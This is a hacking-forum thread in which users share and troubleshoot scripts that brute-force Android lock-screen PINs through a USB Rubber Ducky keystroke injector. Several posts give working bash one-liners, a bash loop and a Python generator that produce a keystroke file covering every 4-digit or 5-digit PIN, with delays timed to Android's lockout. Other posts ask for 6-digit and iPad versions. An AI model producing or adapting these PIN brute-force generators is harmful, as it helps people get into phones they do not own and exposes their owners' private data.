Jaylu1979 Posted March 12, 2017 Share Posted March 12, 2017 The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky? Quote Link to comment Share on other sites More sharing options...
kerravon Posted June 27, 2017 Share Posted June 27, 2017 On 06/12/2012 at 11:31 PM, Darren Kitchen said: I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE] Hey darren, Any chance of putting your 600k script on github so we can look at it? cheers Quote Link to comment Share on other sites More sharing options...
b0N3z Posted June 28, 2017 Share Posted June 28, 2017 echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt 5 digit Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted June 30, 2017 Share Posted June 30, 2017 On 6/28/2017 at 0:36 PM, b0N3z said: echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt 5 digit That will take a very long time.. Quote Link to comment Share on other sites More sharing options...
b0N3z Posted June 30, 2017 Share Posted June 30, 2017 10 hours ago, Dave-ee Jones said: That will take a very long time.. as per Darren about 166hrs Quote Link to comment Share on other sites More sharing options...
Reynold S. Posted July 1, 2017 Share Posted July 1, 2017 Hey I make a script to make the 4 digit combination in Python so, if you have Python just copy the code and then run it and in the output you will have the combination. In Python was more hard to make because Python is not maked to do Bruteforce and their limit but finally I make the code so. (I am Just 15 Years and a starter on Python so possible the code can be better than that) Here is the code: """ change x=int(Put a number) Down Put only 1-9 and copy all code and then you have the Payload """ x=int(0) number=int(0) while (number)<=9: print"STRING",(str(x))+"00"+str(number) print"ENTER" if (number) in list(range(0,9,5)): print"DELAY 34250" (number)+=int(1) else: number+=int(1) if (number) == 10: while number <= int(100): print"STRING",(str(x))+"0"+str(number) print"ENTER" if (number) in list(range(10,100,5)): print"DELAY 34250" (number)+=int(1) else: (number)+=int(1) if (number) == int(100): while number != int(1000): print"STRING",(str(x))+str(number) print"ENTER" if (number) in list(range(100,999,5)): print"DELAY 34250" (number)+=int(1) else: (number)+=int(1) if (number) == int(1000): x+=int(1) break Quote Link to comment Share on other sites More sharing options...
TTT101907 Posted July 3, 2017 Share Posted July 3, 2017 On 12/12/2012 at 5:36 PM, keb0x80 said: I created a script to generate pretty much the same output using only bash loops/conditions #!/bin/bash count=0 echo "DELAY 5000" for pin in {0000..9999} do count=$((count+1)) echo "STRING $pin" # After every other pin, do this if [ $((count % 2)) -eq 0 ]; then echo "DELAY 1000" echo "ENTER" echo "ENTER" fi # After 5 pins, do this if [ $((count % 5)) -eq 0 ]; then for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) )) do echo "DELAY 5000" echo "ENTER" done fi done [/CODE] I'm on the duck tool kit.com and when I put this is the encoder it rejects it as "does not recognize !in bash. What am I doing wrong? Quote Link to comment Share on other sites More sharing options...
TTT101907 Posted July 3, 2017 Share Posted July 3, 2017 On 12/6/2012 at 7:38 PM, Darren Kitchen said: No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter. On 12/6/2012 at 5:31 PM, Darren Kitchen said: I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE] Im in duck tool kit.com and trying to use this script but it doesn't work. What am I doing wrong? Quote Link to comment Share on other sites More sharing options...
TTT101907 Posted July 4, 2017 Share Posted July 4, 2017 On 6/30/2017 at 0:15 PM, b0N3z said: as per Darren about 166hrs Im on the duck tool kit and I can't see to get the script to work. any insight? Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 4, 2017 Share Posted July 4, 2017 The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky. This wont work with just trying to convert the command. Quote Link to comment Share on other sites More sharing options...
TTT101907 Posted July 5, 2017 Share Posted July 5, 2017 On 12/6/2012 at 5:31 PM, Darren Kitchen said: I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE] So how do I use this code on your duck tool kit.com site? Quote Link to comment Share on other sites More sharing options...
b0N3z Posted July 9, 2017 Share Posted July 9, 2017 On 7/5/2017 at 6:24 PM, TTT101907 said: So how do I use this code on your duck tool kit.com site? Do you have linux? Quote Link to comment Share on other sites More sharing options...
Debian8 Posted August 17, 2017 Share Posted August 17, 2017 hi, im a newbie :P .. how i can on Encode this code for work and create Inject.bin? then put into Android Smartphone with USB rubber Ducky? Because the code #!/bin/bashclearecho -e "========================================================"echo -e " This script downloads the rockyou password list"echo -e " IT SAYS that is not language appropriate and i can't create inject file on duckytools.THanks Quote Link to comment Share on other sites More sharing options...
JayMac87 Posted January 14, 2018 Share Posted January 14, 2018 Hello, can I use a raspberry pi 3 to brute force an apple efi? Quote Link to comment Share on other sites More sharing options...
Broti Posted January 14, 2018 Share Posted January 14, 2018 This method won't work on my Android phone. It's set to use the Sim-pin, so 3 wrong tries and you'll need the PUK (aka. SuperPIN) But I have it saved locally in case I get the chance to use it. Quote Link to comment Share on other sites More sharing options...
fabrice Posted January 14, 2018 Share Posted January 14, 2018 I think it's not for the sim pin, but only for android device access. Quote Link to comment Share on other sites More sharing options...
Broti Posted January 14, 2018 Share Posted January 14, 2018 3 hours ago, fabrice said: I think it's not for the sim pin, but only for android device access. I know It's only for the android-based access code option. Quote Link to comment Share on other sites More sharing options...
cmd97 Posted January 16, 2018 Share Posted January 16, 2018 To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named android_brute-force_0000-9999.txt From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k. I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results. Quote Link to comment Share on other sites More sharing options...
Jay1 Posted January 30, 2018 Share Posted January 30, 2018 When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE] The original script^ Quote Link to comment Share on other sites More sharing options...
Broti Posted January 30, 2018 Share Posted January 30, 2018 8 hours ago, Jay1 said: When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help It generates the text-file android_brute-force_0000-9999.txt which you have to encode. The script you posted has to be executed in a shell Quote Link to comment Share on other sites More sharing options...
StevenSeagalathon Posted February 22, 2018 Share Posted February 22, 2018 Does anyone have an idea as to how you would do this if the keypad doesn't allow for numerical entry? For example, it won't recognize numbers, you have to use UDLR and then enter to select a number of the pin. Quote Link to comment Share on other sites More sharing options...
j0nNy_BaNaNa'$ Posted February 22, 2019 Share Posted February 22, 2019 On 1/16/2018 at 3:43 AM, cmd97 said: To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named android_brute-force_0000-9999.txt From there, take that and encode it on ducktoolkit.com. There is one line for every pin combination, why it's 600k. I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results. I doubt it will work on such a recent version ... Surely it works up to the Kitkat version (4.4.2) and maybe (I'm not sure) up to 5.0, but the new android versions after some attempts increase exponentially the waiting time between one attempt and another, and then you should fix the script even just to give it a try .... Quote Link to comment Share on other sites More sharing options...
Sh4dowR00t Posted April 16, 2019 Share Posted April 16, 2019 Hello Darren I love the show and all the information you guys put out> i just got my rubber ducky not long ago and have been messing around with it. i was wondering if there is a way to save the information gathered to the rubberduck itself? and would i be able to say use a 8GB micro instead of the one it came with. sorry if my question seems ignorant or anything im just curious!! Quote Link to comment Share on other sites More sharing options...
Sujal011 Posted November 1, 2020 Share Posted November 1, 2020 I want to know if it works with 6 digit? After some kind of code change (modifying code) I feel better if someone will give me that script code of 6 digit Quote Link to comment Share on other sites More sharing options...
eeeeeesy Posted December 28, 2020 Share Posted December 28, 2020 (edited) @Darren Kitchenis there a payload for bruteforcing old ipad pins? and do you have the link? also would need to know what ducky firmware to use for that. im thinking twin duck c_duck 2.0 firmware. Edited December 28, 2020 by eeeeeesy Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.